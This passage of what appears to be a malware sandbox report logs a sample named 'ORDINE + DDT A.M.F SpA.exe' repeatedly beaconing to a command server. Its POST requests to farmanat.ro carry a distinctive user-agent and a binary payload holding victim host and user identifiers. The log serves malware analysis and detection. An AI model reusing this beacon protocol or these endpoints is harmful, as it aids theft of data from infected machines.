                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:14.756098986 CET6494INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              126192.168.11.2049967176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:15.151566982 CET6495OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:15.185141087 CET6495OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:15.234466076 CET6495INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              127192.168.11.2049968176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:15.668863058 CET6496OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:15.703031063 CET6496OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:15.753048897 CET6497INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              128192.168.11.2049969176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:16.184501886 CET6497OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:16.218053102 CET6498OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:16.281188965 CET6498INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              129192.168.11.2049970176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:16.721052885 CET6499OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:16.755250931 CET6499OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:16.805708885 CET6499INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              13192.168.11.2049848176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:09.107460976 CET6323OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:09.141113997 CET6324OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:09.192800045 CET6324INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              130192.168.11.2049971176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:17.213581085 CET6500OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:17.247226954 CET6500OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:17.299865961 CET6501INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              131192.168.11.2049972176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:17.716881037 CET6501OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:17.750284910 CET6502OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:17.799886942 CET6502INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              132192.168.11.2049973176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:18.186520100 CET6503OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:18.220494032 CET6503OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:18.273413897 CET6503INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              133192.168.11.2049974176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:18.695895910 CET6504OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:18.729501009 CET6504OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:18.781258106 CET6505INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              134192.168.11.2049975176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:19.208676100 CET6505OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:19.242902994 CET6506OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:19.300923109 CET6506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              135192.168.11.2049976176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:19.734179974 CET6507OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:19.767852068 CET6507OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:19.816936970 CET6507INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              136192.168.11.2049977176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:20.231014013 CET6508OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:20.265523911 CET6508OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:20.316693068 CET6509INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              137192.168.11.2049978176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:20.695065975 CET6509OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:20.729275942 CET6510OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:20.786034107 CET6510INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              138192.168.11.2049979176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:21.204317093 CET6511OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:21.237867117 CET6511OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:21.291951895 CET6511INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              139192.168.11.2049980176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:21.725256920 CET6512OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:21.758807898 CET6512OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:21.808264971 CET6513INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              14192.168.11.2049849176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:09.857429981 CET6325OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:09.891676903 CET6325OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:09.977329016 CET6325INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              140192.168.11.2049981176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:22.161051035 CET6513OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:22.195099115 CET6514OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:22.245876074 CET6514INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              141192.168.11.2049982176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:22.694083929 CET6515OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:22.727617025 CET6515OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:22.777534008 CET6515INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              142192.168.11.2049983176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:23.236989975 CET6516OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
